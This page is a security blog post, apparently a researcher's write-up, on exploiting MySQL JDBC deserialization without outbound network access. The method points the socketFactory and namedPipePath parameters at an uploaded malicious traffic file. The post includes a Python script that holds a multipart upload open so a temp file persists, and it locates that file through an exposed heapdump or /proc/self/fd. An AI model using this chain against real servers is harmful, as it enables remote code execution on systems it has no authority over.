<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="mapl3miss">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://mapl3miss.github.io/2025/09/19/jdbc-mysql反序列化不出网利用/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="JDBC-Mysql反序列化不出网利用">
<meta property="og:url" content="https://mapl3miss.github.io/2025/09/19/JDBC-Mysql%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://mapl3miss.github.io/images/redefine-og.webp">
<meta property="article:published_time" content="2025-09-19T04:22:07.000Z">
<meta property="article:modified_time" content="2026-01-02T15:24:13.754Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="javaSec">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mapl3miss.github.io/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/avatar.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/avatar.jpg">
    <!--- Page Info-->
    
    <title>
        
            JDBC-Mysql反序列化不出网利用 | Mapl3miss&#39;s blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"mapl3miss.github.io","root":"/","language":"en","path":"search.json"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Mapl3miss","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":false,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Mapl3miss&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">8</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">JDBC-Mysql反序列化不出网利用</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/avatar.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">mapl3miss</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv2</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-09-19 12:22:07</span>
        <span class="mobile">2025-09-19 12:22:07</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2026-01-02 23:24:13</span>
            <span class="mobile">2026-01-02 23:24:13</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/javaSec/">javaSec</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<p> 在JDBC反序列化中提到jdbc mysql反序列化利用需要构造恶意mysql服务器,之后通过控制jdbc连接参数来连接恶意服务器,通过默认查询语句返回恶意序列化对象触发反序列化漏洞 但如果目标不出网,或者一些后台jdbc连接功能对host做了白名单,这样就不能通过上述方法去利用了</p>
<h1 id="socketFactory属性"><a href="#socketFactory属性" class="headerlink" title="socketFactory属性"></a>socketFactory属性</h1><p>在MySQL驱动中有socketFactory这个选项，它默认值为<code>StandardSocketFactory.class.getName()</code>因此它接收的应该是一个类的名字</p>
<p>MysqlIO在mysql驱动中是一个比较核心的类，在里面有很多的处理逻辑，构造方法如下：</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="title function_">MysqlIO</span><span class="params">(String host, <span class="type">int</span> port, Properties props,</span></span><br><span class="line"><span class="params">      String socketFactoryClassName, MySQLConnection conn,</span></span><br><span class="line"><span class="params">      <span class="type">int</span> socketTimeout, <span class="type">int</span> useBufferRowSizeThreshold)</span></span><br></pre></td></tr></table></figure></div>

<p>socketFactoryClassName是我们的重点关注参数，在createSocketFactory中实现了这样的代码，socketFactoryClassName指定的类名会被调用newInstance来实例化，且这个类必须实现了SocketFactory接口</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> SocketFactory <span class="title function_">createSocketFactory</span><span class="params">()</span> <span class="keyword">throws</span> SQLException &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">this</span>.socketFactoryClassName == <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="keyword">throw</span> SQLError.createSQLException(Messages.getString(<span class="string">&quot;MysqlIO.75&quot;</span>), <span class="comment">//$NON-NLS-1$</span></span><br><span class="line">                SQLError.SQL_STATE_UNABLE_TO_CONNECT_TO_DATASOURCE, getExceptionInterceptor());</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (SocketFactory) (Class.forName(<span class="built_in">this</span>.socketFactoryClassName)</span><br><span class="line">                                     .newInstance());</span><br><span class="line">    &#125; <span class="keyword">catch</span> (Exception ex) &#123;</span><br><span class="line">        <span class="type">SQLException</span> <span class="variable">sqlEx</span> <span class="operator">=</span> SQLError.createSQLException(Messages.getString(<span class="string">&quot;MysqlIO.76&quot;</span>) <span class="comment">//$NON-NLS-1$</span></span><br><span class="line">             +<span class="built_in">this</span>.socketFactoryClassName +</span><br><span class="line">            Messages.getString(<span class="string">&quot;MysqlIO.77&quot;</span>),</span><br><span class="line">            SQLError.SQL_STATE_UNABLE_TO_CONNECT_TO_DATASOURCE, getExceptionInterceptor());</span><br><span class="line">      </span><br><span class="line">        sqlEx.initCause(ex);</span><br><span class="line">      </span><br><span class="line">        <span class="keyword">throw</span> sqlEx;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>在初始化MysqlIO的时候createSocketFactory会被调用，用于提供一个客户端和服务器连接的方式</p>
<p>指定的类是必须实现了SocketFactory接口的，可以找到驱动中内置的满足条件的类，只有两个</p>
<ol>
<li><p><code>StandardSocketFactory</code></p>
</li>
<li><p><code>NamedPipeSocketFactory</code></p>
</li>
</ol>
<p><code>StandardSocketFactory</code>这个类是默认值,它实现了TCP的连接方式连接mysql,使用这个类就需要我们通过网络连接恶意服务器;</p>
<p>而从<code>NamedPipeSocketFactory</code>类中的connect方法中看到，它使用了NamedPipeSocket并传入一个path作为参数，并且将实例化后的对象用作一个与服务器交互的通道：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251230202918.png"
                     
                ></p>
<p><em>使用RandomAccessFile打开并且最终使用这个文件流作为与服务器连接的IO通道</em></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251230201245.png"
                     
                ></p>
<p>namedPipePath参数,也就是文件路径,是可以通过url控制的,这就给予了不出网利用思路:<br>找到一个文件上传点上传恶意流量文件,再通过socketFactory参数指定NamedPipeSocketFactory,并用namedPipePath指向恶意文件路径,充当恶意mysql服务器</p>
<p><em>注:在mysql8中限制了数据包的大小,需要加上maxAllowedPacket&#x3D;74996390参数来绕过</em></p>
<h1 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h1><p>环境:java8 + jdbc-mysql8 + cc3.2.1</p>
<p>恶意流量包可以通过java-chains工具生成,注意jdbc-mysql版本<br><a class="link"   target="_blank" rel="noopener" href="https://github.com/vulhub/java-chains" >vulhub&#x2F;java-chains: Java Vulnerability Exploitation Platform<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251230204144.png"
                     
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251230204423.png"
                     
                ></p>
<h1 id="上传恶意数据文件到目标服务器"><a href="#上传恶意数据文件到目标服务器" class="headerlink" title="上传恶意数据文件到目标服务器"></a>上传恶意数据文件到目标服务器</h1><p>如果web应用没有上传文件的功能点(只要能上传可控内容的文件就可以,不需要能控制文件后缀),可以利用spring web下面的文件上传缓存机制。</p>
<p>spring web（或者tomcat）默认使用commons-fileupload来处理文件上传的数据包，而在上传的数据超过一定阈值时会将上传的数据从内存中缓存到临时文件，在commons-fileupload的 Builder 类的构造方法中定义了一个缓冲区大小DiskFileItemFactory.DEFAULT_THRESHOLD（10240b）</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="title function_">Builder</span><span class="params">()</span> &#123;</span><br><span class="line">            setBufferSize(DiskFileItemFactory.DEFAULT_THRESHOLD);</span><br><span class="line">            setPath(PathUtils.getTempDirectory());</span><br><span class="line">            setCharset(DEFAULT_CHARSET);</span><br><span class="line">            setCharsetDefault(DEFAULT_CHARSET);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure></div>

<p>而上传的数据超过这个缓冲区大小后，就会被缓存到磁盘中，但不确定文件路径，<code>DiskFileItem</code>类中的代码实现：</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="title function_">DiskFileItem</span><span class="params">(<span class="keyword">final</span> String fieldName, <span class="keyword">final</span> String contentType, <span class="keyword">final</span> <span class="type">boolean</span> isFormField, <span class="keyword">final</span> String fileName, <span class="keyword">final</span> <span class="type">int</span> threshold,</span></span><br><span class="line"><span class="params">        <span class="keyword">final</span> Path repository, <span class="keyword">final</span> FileItemHeaders fileItemHeaders, <span class="keyword">final</span> Charset defaultCharset)</span> &#123;</span><br><span class="line">    <span class="built_in">this</span>.fieldName = fieldName;</span><br><span class="line">    <span class="built_in">this</span>.contentType = contentType;</span><br><span class="line">    <span class="built_in">this</span>.charsetDefault = defaultCharset;</span><br><span class="line">    <span class="built_in">this</span>.isFormField = isFormField;</span><br><span class="line">    <span class="built_in">this</span>.fileName = fileName;</span><br><span class="line">    <span class="built_in">this</span>.fileItemHeaders = fileItemHeaders;</span><br><span class="line">    <span class="built_in">this</span>.threshold = threshold;</span><br><span class="line">    <span class="built_in">this</span>.repository = repository != <span class="literal">null</span> ? repository : PathUtils.getTempDirectory();</span><br><span class="line">    <span class="built_in">this</span>.tempFile = <span class="built_in">this</span>.repository.resolve(String.format(<span class="string">&quot;upload_%s_%s.tmp&quot;</span>, UID, getUniqueId()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>可以知道PathUtils.getTempDirectory获取了一个临时目录（实际测试中使用springweb临时目录在&#x2F;tmp下的tomcat的work目录中），并且拼接了一个UID值和getUniqueId()，UID是类被初始化后就固定的一个随机UUID</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231154847.png"
                     
                ><br>而getUniqueId则是自增，每次发生文件缓存都会+1</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> String <span class="title function_">getUniqueId</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="keyword">final</span> <span class="type">var</span> <span class="variable">limit</span> <span class="operator">=</span> <span class="number">100_000_000</span>;</span><br><span class="line">    <span class="keyword">final</span> <span class="type">var</span> <span class="variable">current</span> <span class="operator">=</span> COUNTER.getAndIncrement();</span><br><span class="line">    <span class="type">var</span> <span class="variable">id</span> <span class="operator">=</span> Integer.toString(current);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// If you manage to get more than 100 million of ids, you&#x27;ll</span></span><br><span class="line">    <span class="comment">// start getting ids longer than 8 characters.</span></span><br><span class="line">    <span class="keyword">if</span> (current &lt; limit) &#123;</span><br><span class="line">        id = (<span class="string">&quot;00000000&quot;</span> + id).substring(id.length());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> id;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>因此最后生成的路径如下格式：</p>
<p><code>/tmp/&#123;tomcat_path&#125;/work/Tomcat/localhost/ROOT/upload_&#123;UID&#125;_&#123;UniqueId&#125;.tmp</code></p>
<p>且文件上传请求结束后会被自动调用delete方法进行删除</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231155246.png"
                     
                ></p>
<p>现在可以将文件通过上传缓存的方式生成在服务器上，但是有两个问题需要解决：</p>
<ol>
<li><p>每次请求完成就自动删除，且ID会自增，条件竞争非常困难</p>
</li>
<li><p>临时文件位置随机，无法直接获取</p>
</li>
</ol>
<h2 id="解决自动删除问题"><a href="#解决自动删除问题" class="headerlink" title="解决自动删除问题:"></a>解决自动删除问题:</h2><p>删除逻辑是请求结束执行删除操作,我们可以利用<code>Content-Length:</code>请求头设置很长的值,而实际文件大小并没有很大,会让服务器以为还有很多数据没有被发送过来,会一直等待</p>
<p><em>注意:结束标识符–xxxxxxxx–已经告诉服务器这个multipart包已经结束了，因此将最后一个结束标志的–去除,并且不建议使用burp或yakit发包,会自动修改Content-Length:还可能会主动断开连接</em></p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket  </span><br><span class="line"><span class="keyword">import</span> time  </span><br><span class="line">  </span><br><span class="line">payload_path = <span class="string">r&quot;path_to_payload&quot;</span>  </span><br><span class="line">  </span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(payload_path, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:  </span><br><span class="line">    payload = f.read()  </span><br><span class="line">  </span><br><span class="line">req = <span class="string">b&#x27;&#x27;&#x27;POST / HTTP/1.1  </span></span><br><span class="line"><span class="string">Host: localhost  </span></span><br><span class="line"><span class="string">Accept-Encoding: gzip, deflate  </span></span><br><span class="line"><span class="string">Accept: */*  </span></span><br><span class="line"><span class="string">Content-Type: multipart/form-data; boundary=xxxxxxxx  </span></span><br><span class="line"><span class="string">User-Agent: python-requests/2.32.3  </span></span><br><span class="line"><span class="string">Content-Length: 999999  </span></span><br><span class="line"><span class="string">  </span></span><br><span class="line"><span class="string">--xxxxxxxx  </span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;tmp.txt&quot;  </span></span><br><span class="line"><span class="string">  </span></span><br><span class="line"><span class="string">&#123;&#123;payload&#125;&#125;  </span></span><br><span class="line"><span class="string">--xxxxxxxx&#x27;&#x27;&#x27;</span>.replace(<span class="string">b&quot;\n&quot;</span>, <span class="string">b&quot;\r\n&quot;</span>).replace(<span class="string">b&quot;&#123;&#123;payload&#125;&#125;&quot;</span>, payload)  </span><br><span class="line">skt = socket.socket()  </span><br><span class="line">skt.connect((<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">8085</span>))  </span><br><span class="line">skt.sendall(req)  </span><br><span class="line">time.sleep(<span class="number">999</span>)</span><br></pre></td></tr></table></figure></div>

<p>文件成功留存<br>windows临时文件位置C:\Users\用户\AppData\Local\Temp\tomcat……\work\Tomcat\ip\ROOT</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231163932.png"
                     
                ></p>
<p>Linux:&#x2F;tmp&#x2F;{tomcat_path}&#x2F;work&#x2F;Tomcat&#x2F;localhost&#x2F;ROOT&#x2F;upload_{UID}_{UniqueId}.tmp</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231181313.png"
                     
                ></p>
<h2 id="解决文件位置问题"><a href="#解决文件位置问题" class="headerlink" title="解决文件位置问题:"></a>解决文件位置问题:</h2><h4 id="利用heapdump泄露"><a href="#利用heapdump泄露" class="headerlink" title="利用heapdump泄露"></a>利用heapdump泄露</h4><p>如果目标有heapdump泄露漏洞,可以利用此漏洞分析heapdump文件找到上传文件路径</p>
<p>环境配置<br>pom.xml中引入actuator依赖</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;  </span><br><span class="line">    &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;  </span><br><span class="line">    &lt;artifactId&gt;spring-boot-starter-actuator&lt;/artifactId&gt;  </span><br><span class="line">&lt;/dependency&gt;</span><br></pre></td></tr></table></figure></div>

<p>配置不安全配置</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">management.endpoints.web.exposure.include=*  </span><br><span class="line">management.endpoint.heapdump.enabled=true</span><br></pre></td></tr></table></figure></div>

<p>安全配置应该为</p>
<div class="code-container" data-rel="Java"><figure class="iseeu highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">management.endpoints.web.exposure.include=health,info<span class="comment">//白名单</span></span><br><span class="line">management.endpoints.web.exposure.exclude=heapdump,threaddump,env,configprops,beans,mappings<span class="comment">//黑名单</span></span><br><span class="line">management.endpoint.heapdump.enabled=<span class="literal">false</span><span class="comment">//直接从根上禁用 JVM 堆导出</span></span><br></pre></td></tr></table></figure></div>

<p>发文件上传包之后访问&#x2F;actuator&#x2F;heapdump拿到heapdump文件</p>
<p>用工具解析,找到上传文件的路径<br>这里用的是visualVM<br>路径信息在<code>org.apache.tomcat.util.http.fileupload.disk.DiskFileItem</code>这个类下面</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231191401.png"
                     
                ></p>
<p>如果是直接用的heapdump自动扫描工具如(JDumpSpider)是扫不到这个临时文件信息的</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231191725.png"
                     
                ></p>
<p>最多也就只能看到这些信息</p>
<p>在我们分析heapdump的时间里面，可能已经触发了超时机制，连接被强制断开并删除临时文件了。但是我们可以预判下一个临时文件的名字，只需要修改<code>/tmp/&#123;tomcat_path&#125;/work/Tomcat/localhost/ROOT/upload_&#123;UID&#125;_&#123;UniqueId&#125;.tmp</code>中的<code>UniqueId</code> + 1即可。</p>
<h4 id="利用Linux的-proc-self-fd-xx-不需要其他漏洞打配合"><a href="#利用Linux的-proc-self-fd-xx-不需要其他漏洞打配合" class="headerlink" title="利用Linux的&#x2F;proc&#x2F;self&#x2F;fd&#x2F;xx(不需要其他漏洞打配合)"></a>利用Linux的&#x2F;proc&#x2F;self&#x2F;fd&#x2F;xx(不需要其他漏洞打配合)</h4><p>Linux下，应用程序打开一个文件，并且在没有关闭的情况下&#x2F;proc&#x2F;self&#x2F;fd&#x2F;xx会生成一个文件描述符，如果打开的是一个文件，这个文件描述符实际上指向的是这个文件的具体路径。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/Pastedimage20251231211901.png"
                     
                ></p>
<p>所以在利用的时候文件路径只需要写&#x2F;proc&#x2F;self&#x2F;fd&#x2F;xx就可以(xx需要爆破一下,很好爆破)</p>
<p>但需要注意的是文件需要是打开状态,而像上面那样写的话因为文件后面有–xxxxxxxx结束符,文件参数上传完之后就会关闭,所以需要把结束符删掉来让应用以为文件内容还没写完而保持打开状态</p>
